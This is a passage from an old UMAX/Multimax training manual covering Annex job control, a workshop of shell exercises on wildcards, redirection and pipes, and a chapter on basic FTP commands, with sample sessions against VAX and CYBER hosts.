+ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +If there are no jobs, the annex: prompt will be displayed. If +there are some 'suspended' jobs the following will appear: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ annex: jobs ³ +³ +1 rlogin domax1 ³ +³ -2 rlogin domax1 ³ +³ annex: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +This shows that there are two jobs in suspension. Both of these +sessions did a remote login to domax1. This is just for +illustration. +The fg (foreground) command returns to a suspended job. The +command displays the job number and the Annex command that +created it. When no arguments are provided, fg will return to +the most recent job. With a numeric argument, fg returns the +specified job. + +To connect with a suspended job (session) enter the following +Annex command: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: fg [n] º +º º +º (none) - most recent job (+) to foreground º +º n - job "n" to foreground º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ annex: jobs ³ +³ +1 rlogin domax1 ³ +³ -2 rlogin domax1 ³ +³ annex:fg 1 ³ +³ 1 rlogin domax1 ³ +³ (Ret) ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +Workshop 6 + +This workshop will reinforce your understanding of the topics +covered in this chapter. Login to the Multimax with the username +and password given to you by the instructor. Each student is to +complete the entire workshop. Computer exercises might need to +be worked as a team. + +DESK EXERCISES + + +1. What is the meaning of the term "case sensitive?" + + + + + +2. What is a wildcard? + + + + + +3. How does the shell interpret the following wildcards? + + a. ? + + b. [0-9] + + c. * + + + +4. How does the shell interpret the following strings? + + a. M[i,r]* + + + b. b?ll + + + c. me??[1,2] + + + d. '*special*' + + + e. anyone\? + + + + Continue on the next page +5. What is "standard input?" + + + + + + +6. What symbol causes a command to take its input from a file? + + + + + + +7. What is "standard output?" + + + + + +8. What symbol causes the output of a command to be redirected + to a file? + + + + + + +9. What symbol causes the output of a command to be redirected + to the input of another command? + + + + + + +10. What symbol is used to indicate input is to be from a file + instead of the keyboard? + + + + + + +11. How can the output from a command be saved in an ordinary + file? + + + + + + Continue on the next page +12. What is a pipe? No, it's not something you smoke. + + + + + +COMPUTER EXERCISES + + +13. Login to the Multimax + + + + + +14. How many different on-line manual entries are displayed by + executing the command man ca*? + + + + + + +15. Execute man ls | pg. What is the purpose of the | + character? + + + + +16. Save the on-line manual pages on the cat command in a file + called mp0. (hint: output redirection) + + + + + +17. Save the on-line manual pages on the assist command in a + file called mp1. (no hint this time) + + + + + +18. Type cp mp0 man + + Does file mp0 still exist after this command is executed? + + Why? + + + + Continue on the next page +19. Type mv mp1 assist + + Does file mp1 still exist after this command is executed? + + Why? + + + + + +20. Type cp mp3 man + + What error message do you get? + + + + + +21. Logout of the Multimax and the Annex. +7. UMAX FILE TRANSFER PROTOCOL (FTP) + + +File Transfer Protocol (FTP) is a utility which can transfer +files to and from TCP/IP networked computers. TCP/IP stands for +Transmission Control Protocol/Internet Protocol and consists of a +suite of defacto standard protocols for networking computers. +FTP is one protocol in that suite. (Other significant protocols +within TCP/IP are TELNET, Simple Mail Transfer Protocol (SMTP), +and Network File Systems (NFS).) The Client portion of UNIX FTP +lets users on the Multimax access file systems on a remote +computer. The Server portion of UNIX FTP lets users on remote +computers access Multimax files. For Reclamation, these remote +computers would be VAXes, CYBERs, IBMs, and Sun workstations. + +Using FTP, you can access directories and files on a remote +computer and perform common operations, such as list and change +working directories, transfer files, create directories, delete +working directories, delete files and directories, and rename +files and directories. Once you have entered the FTP utility, +you make a connection to the desired remote computer and then +work with the remote computer's files using FTP commands. The +connection to the remote computer's FTP remains in effect until +terminated by the user. Multimax FTP supports both local help +for FTP commands and remote help, which displays FTP elements +available on the remote computer. + +Throughout this chapter, the term "local computer" will refer to +the Multimax. The term "remote computer" will refer to the CYBER +mainframe or the VAX minicomputer. Please be aware that these +procedures will work for any computer connected to the Ethernet +that has an FTP server installed. The messages that appear may +be different, but the process will be the same. +7.1 Initializing FTP on UMAX + + +FTP can be invoked on the Multimax using the following syntax: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: ftp [options] [host] º +º º +º options - see man pages for a complete list º +º º +º host - the name of the remote computer º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +NOTE: UNIX is case sensitive. The commands and options must + be entered as shown. +7.2 Establishing Connection with the Remote Computer + + +There are two ways to make a connection with the remote computer. + +7.2.1 Calling FTP with no hostname + +The first way is to invoke FTP using no options, simply enter the +ftp command at the shell prompt. UMAX will respond with the ftp +prompt: ftp> + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ftp ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +FTP commands can now be entered. The utility has its own set of +commands, and we will discuss about 12 of them in this chapter. +A complete list of the FTP commands can be obtained by entering +help at the FTP prompt. + +The command to establish a connection with remote computer is: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: open [port] º +º º +º host - hostname, this host must have an FTP server. º +º º +º port - port number (optional) º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +This command will establish a connection to the remote computer's +FTP server. The hostname for the VAX is ERC830. The following +FTP command will establish a connection with the VAX (ERC830): + + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>open erc830 ³ +³ Connected to erc830. ³ +³ 220 erc830 Wollongong FTP Server (Version 5.0) at Mon Dec 4 ³ +³ Name (ERC830:rharding): ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +The cursor will stop after the colon. FTP is waiting for you to +enter the login name to use when signing on to the remote +computer. FTP tries to help you out by giving you a default +login name. In the above example, the default login name is +rharding. To select the default name, press (Ret). You can +enter any login name you want and then press (Ret). After you +have selected the login name, either by choosing the default or +entering a new name, you will be asked for the password. + + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ 331 Password required for rharding. ³ +³ Password: ³ +³ 230 User logged in, default directory D_1131:[RHARDING] ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Enter the password required for the login name that you +specified. Echoing is disabled and the password you enter will +not be displayed on the screen. If you entered the correct +password, message number 230 will show you are logged in and the +default directory on the remote system. You are now logged into +the remote computer system and can proceed to transfer files. + + +CYBER Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ftp ³ +³ ftp>open cy2 ³ +³ Connected to cy2. ³ +³ 220 SERVICE READY FOR NEW USER. ³ +³ Name (cy2:rharding): class8 ³ +³ 331 USER NAME OKAY, NEED PASSWORD. ³ +³ Password: secret ³ +³ 230 USER LOGGED IN, PROCEED. ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This example for the CYBER is similar to the VAX example. Notice +that there a few differences. The login name was changed from +rharding and the username class8 was entered instead. +7.2.2 Calling FTP with a hostname + + +The second method of signing on to the remote computer is to +specify the name of the remote computer on the call to ftp. + + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ftp erc830 ³ +³ 220 erc830 Wollongong FTP Server (Version 5.0) at Fri Dec ³ +³ Name (ERC830:rharding): ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +You can now enter the username for the remote system, and you +will then be prompted for the password. The effect of specifying +the hostname on the ftp command line is to do an "automatic" open +command. + +NOTE: The messages are slightly different from the VAX login. + The login for the CYBER works in a similar manner. +7.3 Local Computer Commands + + +From the FTP prompt, you can issue commands to the local computer +to display files or show the contents of a directory. The +commands you enter are FTP commands; and although they might +resemble UNIX commands, they are NOT UNIX commands. + +The FTP command to transfer file(s) from the remote computer to +the local computer is as follows: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: get [local-file] º +º º +º remote-file - the filename on the remote computer º +º º +º local-file - the filename on the local computer º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +This FTP command will retrieve the remote-file and store it on +the Multimax. If the local-file name is not specified, the name +of the file on the Multimax will be the same as it was on the +remote computer. The current settings for type, form, mode, and +structure will be used during the file transfer. + + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>get overview.dat ³ +³ 200 PORT Command OK. ³ +³ 125 File transfer started correctly ³ +³ 226 File transfer completed ok ³ +³ local: overview.dat remote: overview.dat ³ +³ 884 bytes received in 0.04 seconds (22 Kbytes/s) ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Messages 200, 125, and 226 let you know that the file transferred +properly. The next line shows the local-filename, in this case +we didn't specify the local-filename, so the remote-filename and +the local-filename are the same. The next line shows the number +of bytes transferred and the amount of time it took to transfer +the file. +CYBER Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>get prolog8 ³ +³ 220 COMMAND OKAY. ³ +³ 150 FILE STATUS OKAY; ABOUT TO OPEN DATA CONNECTION. ³ +³ 226 CLOSING DATA CONNECTION. ³ +³ local: prolog8 remote: prolog8 ³ +³ 41 bytes received in 0.8 seconds (0.05 Kbytes/s) ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +7.3.1 Changing the Local Directory + + +The directory on the local computer can be changed to any +directory you desire. This is called the working directory. +This is the directory where files that are transferred from the +remote computer will be stored. + +The syntax of the command to change local working directory is as +follows: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: lcd [dirname] º +º º +º dirname - the name of the new local working directory º +º º +º if directory is omitted, the home directory is assumed º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>lcd /user0/student0 ³ +³ Local directory now /user0/student0 ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Absolute or relative pathnames can be specified for directory. +7.3.2 Listing the Contents + + +Any UNIX command can be entered from the FTP utility. You must +preface the command with the FTP command that invokes the +interactive shell. + +The syntax to invoke the interactive shell is as follows: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: ! [command [arguments]] º +º º +º command - any valid UNIX command, if omitted the º +º interactive shell is invoked º +º º +º arguments - if supplied are arguments to the UNIX command º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +If arguments are provided, the first argument is considered to be +the UNIX command and the remaining arguments are considered to be +arguments to that command. + + +Example: + +................................................................. +. ftp>!ls -la . +................................................................. + + +This command will display the contents of the local working +directory. The l option specifies the 'long' listing, and the a +option requests all files including the initialization files. +7.4 Remote Computer Commands + + +From the FTP prompt, you can issue commands to the remote +computer to display files or show the contents of the remote +directory. Recall that the commands you enter are FTP commands; +and although they look like UNIX commands, they are not. + +Transferring file(s) from the Multimax to the remote computer is +accomplished with the following command: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: put [remote-file] º +º º +º local-file - the filename on the local computer º +º º +º remote-file - the filename on the remote computer º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +This FTP command will retrieve the local-file, transfer it to the +remote computer, and store it in the remote directory. If the +remote-file is not specified, the name of the file on the remote +computer will be the same as it was on the Multimax. The current +settings for type, form, mode, and structure will be used during +the file transfer. + + +VAX sample sessions: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>put memo ³ +³ 200 PORT Command OK. ³ +³ 125 File transfer started correctly ³ +³ 226 File transfer completed ok ³ +³ local: memo remote: memo ³ +³ 2299 bytes sent in 0.08 seconds (28 Kbytes/s) ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Messages 200, 125, and 226 let you know that the file transferred +properly. The next line shows the local-filename. In this case, +we didn't specify the local-filename, so the local-filename and +the remote-filename are the same. The next line shows the number +of bytes sent and the amount of time for the transfer. +CYBER Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>put memo ³ +³ 200 COMMAND OKAY. ³ +³ 150 FILE STATUS OKAY; ABOUT TO OPEN DATA CONNECTION. ³ +³ 226 CLOSING DATA CONNECTION. ³ +³ local:memo remote:memo ³ +³ 2299 bytes sent in 0.08 seconds (28 Kbytes/s) ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +7.4.1 Changing the Remote Directory + + +The directory on the remote computer can be changed to any +directory you want. This is called the remote working directory. +This is the directory where files that are sent from the Multimax +will be stored. + +The syntax for the command to change remote working directory is +as follows: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: cd º +º º +º remote-dirname - the name of the new remote working º +º directory º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>cd d_1131:[gholdaway] ³ +³ 200 Working directory changed to D_1131:[GHOLDAWAY] ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +You must specify a valid directory on the remote computer. + + +CYBER Example: + +................................................................. +. 502 COMMAND NOT IMPLEMENTED. . +................................................................. + +The reason this command is not implemented on the CYBER is +because NOS does not support the idea of directories. +7.4.2 Listing the Contents + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: ls [remote-dirname] [local-file] º +º º +º remote-dirname - working directory on remote computer º +º º +º local-file - local file where the remote-directory º +º contents will be written. If omitted, º +º the output is sent to the screen. º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>ls ³ +³ 200 PORT Command OK. ³ +³ 125 File transfer started correctly ³ +³ login.com;13 ³ +³ jeff.;1 ³ +³ test.com;1 ³ +³ 226 File transfer completed ok ³ +³ 228 bytes received in 0.06 seconds (0.34 Kbytes/s) ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Since no remote directory was specified, the contents of the +current working directory is transferred and no local file was +specified, so the output is displayed on the screen. + + +CYBER Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>ls ³ +³ 200 COMMAND OKAY. ³ +³ 150 FILE STATUS OKAY; ABOUT TO OPEN DATA CONNECTION. ³ +³ PROLOG8 ³ +³ FSEP1A ³ +³ FSEP1 ³ +³ FSEP2 ³ +³ 226 CLOSING DATA CONNECTION. ³ +³ 52 bytes received in 1 seconds (0.05 Kbytes/s) ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +7.5 Closing the Connection + + +The current FTP session with the remote server can be terminated +without leaving FTP. When the current session is terminated a +session to another remote FTP server can be initiated. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: close º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +This command will terminate the current FTP session with the +remote server and return to the FTP command interpreter. + + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>close ³ +³ 221 Goodbye. ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +CYBER Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>close ³ +³ 221 SERVICE CLOSING CONTROL CONNECTION. LOGGED OUT. ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +7.6 Exiting FTP + + +When you have finished using FTP, the following command will +terminate FTP and return control to the shell. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: quit º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +This command will terminate the current FTP session and exit FTP. + + +VAX Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>quit ³ +³ 221 Goodbye. ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +CYBER Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>quit ³ +³ 221 SERVICE CLOSING CONTROL CONNECTION. LOGGED OUT. ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +7.7 Special FTP Commands + + +This section will discuss some FTP commands that are useful in +using FTP. They include an on-line help, status, and the ! +character. + +The help command will display all of the FTP commands on the +screen. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: help [command] º +º º +º command - an FTP command º +º º +º if omitted, prints a list of all known commands º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Sample Session: + 